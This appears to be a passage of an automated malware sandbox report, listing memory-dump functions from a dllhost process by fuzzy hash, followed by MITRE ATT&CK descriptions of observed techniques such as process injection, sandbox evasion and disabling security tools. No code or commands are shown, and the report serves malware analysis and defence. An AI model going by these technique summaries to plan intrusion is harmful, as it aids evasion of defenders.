Source File: 0000002A.00000002.3335021747.0000000000B80000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_b80000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140f800ae6d6e5ed2055aeca1e39cb9e6857f5ec9a49b03cc6d28054f73a3d51
Instruction ID: acd245976533667d3e12567844954edab01c91b5dd036ba6d474ed26b611b34e
Opcode Fuzzy Hash: 140f800ae6d6e5ed2055aeca1e39cb9e6857f5ec9a49b03cc6d28054f73a3d51
Instruction Fuzzy Hash: B3E092B66046005BD650CF0BEC81452F7D8EB84630718C07FEC0D8B711D275B504CAB5

Function 009915D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82da7b37fd8c0ea052e7559aeae824b12d6ec2903ebaedad39b6469ba46cff71
Instruction ID: fc400aaeb54198ab350058ca1211a358155c879f47a3d5709924216378337586
Opcode Fuzzy Hash: 82da7b37fd8c0ea052e7559aeae824b12d6ec2903ebaedad39b6469ba46cff71
Instruction Fuzzy Hash: 7D017EB4D00229CFCF60CF18CD80BD9B7B1BB89205F0085EA964DA2211EB316E85DF59

Function 00996D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e5ecae6bc6bd437849b627c02f7cbfe2d697b341528904a6c4070c4d424686
Instruction ID: 2576c4c73cd17e98c379823ea1e7bb695394d81b207548441d4fd67fb8526390
Opcode Fuzzy Hash: 33e5ecae6bc6bd437849b627c02f7cbfe2d697b341528904a6c4070c4d424686
Instruction Fuzzy Hash: C5F02B30B002049BDF24A7B4BC0C3A97799FBC5702F004868D902C33C0DFB95E448352

Function 00996A88 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55e4cefa184a6fd6c0060feb39e931e215885f8cd5c4293482137b337c1a3e52
Instruction ID: a2caf51d87e631573ffbf1aa91f7c23659fea7a4d801c4450b2749332fbec2f8
Opcode Fuzzy Hash: 55e4cefa184a6fd6c0060feb39e931e215885f8cd5c4293482137b337c1a3e52
Instruction Fuzzy Hash: B5E0E57105E3989FC7031B20A8204563F38AE5321530752E6F5488F672E7764E59C7AA

Function 00992E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae75f37c190630a617abfd055b1242c4edd0e40233597d7f0ce89ed2148e4db9
Instruction ID: 2adb7f3d1806ca902c439de3aefd18f2549126d4651212581ee84981b03faf19
Opcode Fuzzy Hash: ae75f37c190630a617abfd055b1242c4edd0e40233597d7f0ce89ed2148e4db9
Instruction Fuzzy Hash: A1E08630A08151DFEF405F68DC1476D77B4BB54321F054475A849D3340D6344E40CF91

Function 00993A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d631db52ae59163484a23ba3b35dcd87619fd1968e0225c93ffdffa6d97459a
Instruction ID: 944cf3624cf3a992d653ad5d33317b716a0b84a25d2777427eead5eed4492505
Opcode Fuzzy Hash: 0d631db52ae59163484a23ba3b35dcd87619fd1968e0225c93ffdffa6d97459a
Instruction Fuzzy Hash: 90E0C231608461DFEF809B1CC90535C33E0BB1A350F5980A6E806DB381C7398D809FC6

Function 008223F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3329424518.0000000000822000.00000040.00000800.00020000.00000000.sdmp, Offset: 00822000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_822000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb44f62a00fff67ff45c575d3be90eb31ced13f26a171d47c1ce90fbbf9d0b0
Instruction ID: 9418ebbe93bad4d5b151a00edd44926a4c6a78a0c704a876534af64b3716141f
Opcode Fuzzy Hash: 7eb44f62a00fff67ff45c575d3be90eb31ced13f26a171d47c1ce90fbbf9d0b0
Instruction Fuzzy Hash: DAD02E392096908FE312EA0CD1A4B8537D4FB40714F0A00FAAC00CB363C368D8C0C600

Function 008223BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3329424518.0000000000822000.00000040.00000800.00020000.00000000.sdmp, Offset: 00822000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_822000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21153bf89d95f6b4d20a9dcf1ba0ca8d0fffd42632ff17faa5b7b2fc7a535160
Instruction ID: c01c210b4621316bd596222263ba5ae1d60af8e4ab79a7694aee3392389abbc1
Opcode Fuzzy Hash: 21153bf89d95f6b4d20a9dcf1ba0ca8d0fffd42632ff17faa5b7b2fc7a535160
Instruction Fuzzy Hash: 7CD05E346052814BDB19DA0CD2D8F5933D4BF44714F0644E8AC10CB372C7A8D8C0CA00

Function 00996CD8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8953d3bd9f0b6598e1bcda52c4c4896bebedda646cda5efb9fdb01b2839a2d
Instruction ID: 0d6648d34157bbd099783f49bd7adfdb491c68b4c0e8a49820351ce8bb8fcd0d
Opcode Fuzzy Hash: 0b8953d3bd9f0b6598e1bcda52c4c4896bebedda646cda5efb9fdb01b2839a2d
Instruction Fuzzy Hash: 76D0022405A7455FC75317655C125427F34EF4376078A12C2E5648F1F2D5151D4687BB

Function 0099110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9114be9d5ffba5c4b2373c6add9f1d2095de0c7e959c20e62ceeee4742989a
Instruction ID: d25d73f396ea8052afcec02dd7d926ffc05d04710062f065c94e3169029fc228
Opcode Fuzzy Hash: 9b9114be9d5ffba5c4b2373c6add9f1d2095de0c7e959c20e62ceeee4742989a
Instruction Fuzzy Hash: 66D0A738A0C114D7FB504F18EC183ACB7B4BB51310F0004B0D809C6190CBB88E80CFC1

Function 00996998 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bce139176f57eb3cf7f83380139a06aef0265b7edc81faf061191e9b7d68c9
Instruction ID: cd78b43caef973706c6df9658c25706a257a17e0a9389a7021bef99774fd549d
Opcode Fuzzy Hash: 66bce139176f57eb3cf7f83380139a06aef0265b7edc81faf061191e9b7d68c9
Instruction Fuzzy Hash: A9D01230019380CFD302AB34D029A913BB2EF0720570648E3E048DF133D3340C46CB26

Function 009D0DF9 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536d69bdd6c5528063d1dae7d8993c9e986b49fa0f79538055d3535718f43a58
Instruction ID: c37129704aa973f808e6570f967c4a5ba50ced05d5dca9fecc8ed38512f28199
Opcode Fuzzy Hash: 536d69bdd6c5528063d1dae7d8993c9e986b49fa0f79538055d3535718f43a58
Instruction Fuzzy Hash: 5CC04C626EE3C50EC71302B014540D4AF2448B351934911DBF08A8B1E6D52A491D4711

Function 00996C39 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b487b0b957d4ea45f4493ec54854068d1dda61c82d8505f72bb5510e8338d97
Instruction ID: 213fc762b9badc385b443c43956806f740e84e64f2fd080f2577919dc6837f8f
Opcode Fuzzy Hash: 0b487b0b957d4ea45f4493ec54854068d1dda61c82d8505f72bb5510e8338d97
Instruction Fuzzy Hash: 8FC04C5581F3D05EDF03577019A44167F751D0301834B41DBD48C9E467D60C0949C766

Function 009D098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c658047ce26672e75cbbac2c028806d818f9cff73d55ae6a1f1ca1724ec14284
Instruction ID: 19ee130a82228b65caa313cd62eb8e01a8b1809d4245aef61abdf3cf303f5493
Opcode Fuzzy Hash: c658047ce26672e75cbbac2c028806d818f9cff73d55ae6a1f1ca1724ec14284
Instruction Fuzzy Hash: 65C04C70E05204CBDF449BB4D51C39C7AB1ABD4300F50481990069B385DA7C4544C741

Function 009D057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b4c67e51fbafd5a2d67e6287a9ff6db4f96e22d5a41873c5614d98e347ae80
Instruction ID: a27879a8128855ce7e0d7e1aecdc5c6d4d7166880261982eaaa41d51c9953b0b
Opcode Fuzzy Hash: 90b4c67e51fbafd5a2d67e6287a9ff6db4f96e22d5a41873c5614d98e347ae80
Instruction Fuzzy Hash: F8C04C70E49204CBEF549BB4951839C7AB1ABD4300F60881D90069B385DE7C4A449B51

Function 0099F250 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d57312aca0edcd74ac6fc7227624bc58c5628dde401d09736ae4175a865baeb
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: 9d57312aca0edcd74ac6fc7227624bc58c5628dde401d09736ae4175a865baeb
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 009969A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0099A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd886e34c4e5383e7ce55f610ad065c70d2274550f1e1671ca6939f492dae120
Instruction ID: 3a140fc6b30b313d8157c62d32ac8540c3df4e1113b310b218d08df18042c5d2
Opcode Fuzzy Hash: cd886e34c4e5383e7ce55f610ad065c70d2274550f1e1671ca6939f492dae120
Instruction Fuzzy Hash: EFA00232244A0C8B4E4037ED7C0B75DB75DADC86957804451B51D455935F65B91089A6

Function 00996AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11fe7af341621a70014ab59fb04e6347ce16a9fe638ba00c2fd8c43d62358a87
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 11fe7af341621a70014ab59fb04e6347ce16a9fe638ba00c2fd8c43d62358a87
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 0099F758 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fb63fdd3ff8fcbb99ae0e69d4b4e9baed596b4bcbc086bb6cfbba525d4b906
Instruction ID: 9f298da58c252dbc3072962d7ff01bcfe03185eda77c8a410282eaeed15df0b9
Opcode Fuzzy Hash: 54fb63fdd3ff8fcbb99ae0e69d4b4e9baed596b4bcbc086bb6cfbba525d4b906
Instruction Fuzzy Hash: 02A0021168C30C22D44022D67802B55765C4B92A69E814061E60D0AE911982745410EE

Function 009D0E08 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334701072.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_9d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24842fa3a520a5e9a65d25d14eea3730268b5f8c5ceb49bee84b2259abb24c6d
Instruction ID: 561036fe7af1ca5b89911b14e33b34be8dcf07ffa9ca6489a158acbc6734831c
Opcode Fuzzy Hash: 24842fa3a520a5e9a65d25d14eea3730268b5f8c5ceb49bee84b2259abb24c6d
Instruction Fuzzy Hash:

Function 0099E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756e128f5d4aa4776dac7c9485f13d05d40772d76c996619f6271ac30e05eabb
Instruction ID: 297c73b3b3554fc626729d69b36838d6cc028db6e41d5114d82462f5fce55f07
Opcode Fuzzy Hash: 756e128f5d4aa4776dac7c9485f13d05d40772d76c996619f6271ac30e05eabb
Instruction Fuzzy Hash: AD90047114470CCF454037D57D0D555F75CF5C45177C00451F50D415115FF5755047D5

Function 00996C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a232dafe683a4a0e62b6baf7a99185db34ab8fbb2fa320f2d9f15f75ed9031
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: 03a232dafe683a4a0e62b6baf7a99185db34ab8fbb2fa320f2d9f15f75ed9031
Instruction Fuzzy Hash:

Function 0099F840 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868895215b5375946e12a7ab4cc91ed3702f8550129fb582c49fc1f52711ed7b
Instruction ID: 2750d2a667c22864fcb631b9a9c2016866c9b6878674cfcb6a828f52c178f59a
Opcode Fuzzy Hash: 868895215b5375946e12a7ab4cc91ed3702f8550129fb582c49fc1f52711ed7b
Instruction Fuzzy Hash:

Function 0099F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ae3013d35318f532debdcd835728600d03c5434548ee8e0fe639015d3ed8748
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: 1ae3013d35318f532debdcd835728600d03c5434548ee8e0fe639015d3ed8748
Instruction Fuzzy Hash:

Function 0099EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8601673fee4419c493e26bf8c864a67b65e7a5c27fe196e90f82e4a897199e5c
Instruction ID: 1db3f34abd33a675edaa9bd9efba958f26389778bd0cb1762bfd6377c865ba5f
Opcode Fuzzy Hash: 8601673fee4419c493e26bf8c864a67b65e7a5c27fe196e90f82e4a897199e5c
Instruction Fuzzy Hash: 5A90023144470DCB45442B957809595775CE584D267810451B51D417115E66646045D9

Function 0099DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 715a8574b6f46959feb7c75132908d2eea41683b02611ee8c07e59c3cc2fc1fe
Instruction ID: 8c390dc6b98453691e9f8855b17821ced40e9f7ac36ecedf00fded59ea8dc848
Opcode Fuzzy Hash: 715a8574b6f46959feb7c75132908d2eea41683b02611ee8c07e59c3cc2fc1fe
Instruction Fuzzy Hash: 4490023104460D9B464127957809555B75CA5949157808451A50D415125A65E9154599

Function 0099F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.3334346650.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_990000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f69446dd173fc70ea47b7622fbe23618cbefeea4d5156b8c36e0e9d41e47790
Instruction ID: 882d3ec37570db38cdc72c68e8250bf2b51a68caf8c031a475e7bb08ebe0120f
Opcode Fuzzy Hash: 0f69446dd173fc70ea47b7622fbe23618cbefeea4d5156b8c36e0e9d41e47790
Instruction Fuzzy Hash: 8A90023144870ECB458427957909555775CA5845157800455B50D419125E556510459D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
